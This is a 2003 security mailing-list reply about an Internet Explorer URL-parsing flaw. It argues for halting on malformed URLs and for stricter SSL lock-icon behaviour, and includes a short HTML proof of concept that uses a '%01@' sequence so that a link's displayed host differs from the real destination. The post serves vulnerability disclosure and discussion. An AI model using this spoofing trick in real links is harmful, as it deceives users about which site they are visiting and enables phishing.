Open Source and information security mailing list archives
From: emvs.fd.3FB4D11C at cpo.tn.tudelft.nl (Erik van Straten)
Subject: Re: Internet Explorer URL parsing vulnerability

Hi all,

On Wed, 10 Dec 2003 13:01:42 -0500 Valdis Kletnieks wrote:
> Most reasonable software will put in an outline-box or "\NNN", or
> other similar indication a glyph is not displayable in the charset
> in use, and then *continue trying* to render the rest of the
> string.

I disagree that software should attempt to continue parsing URLs
(and *ML code for that matter) after an error or if something
unexpected happens. This is asking for lots of new vulns. Instead,
everything should come to a halt and a "page" or errorbox should
say "Bad URL syntax".

An IE warningbox for "legitimate" use of @ in URLs would be great.

In case of SSL, the lock icon should *immediately* disappear, and
an (optional) warningbox should pop up, if the hostname in the cert
no longer matches *either* the one displayed in the URL combobox
*or* the actual underlying connection. Also, probably it is a good
idea to have the page turn blank (or have a red cross) as soon as
the displayed URL doesn't match the connection (for example if
someone starts to manually edit the URL, but eventually does not
press enter).

Now for the fun part.

Some people have rightfully expressed their concerns whether
https://www.betaplace.com actually is a Microsoft site (it is).

To confirm, visit https://www.betaplace.microsoft.com ; it works,
however currently the certificate is invalid (hostname mismatch).

Here's my tip for Microsoft (acks to Petard :)
Save to file whatever.htm, and open that in MSIE:

-------------- start cut here -------------
<HTML><BODY>
<a href="https://www.betaplace.microsoft.com"
onclick="location.href=unescape(

'https://www.betaplace.microsoft.com%01@....betaplace.com/betaplace/sign-in/betaplace.asp'

); return false;">
Visit the *REAL* Microsoft's BetaPlace site</a>
</BODY></HTML>
-------------- end cut here -------------

Note: if the line with '' in the middle wraps, unwrap it before
saving to the htm file. There shouldn't be any spaces in it. The
blank lines in between are okay.

Cheers,
Erik

On Thu, 11 Dec 2003 19:20:14 +0000 Petard wrote:
> It gets better... it works with SSL sites as well. The little lock, and
> no warning message:
> http://petard.freeshell.org/hotmail-pr.html

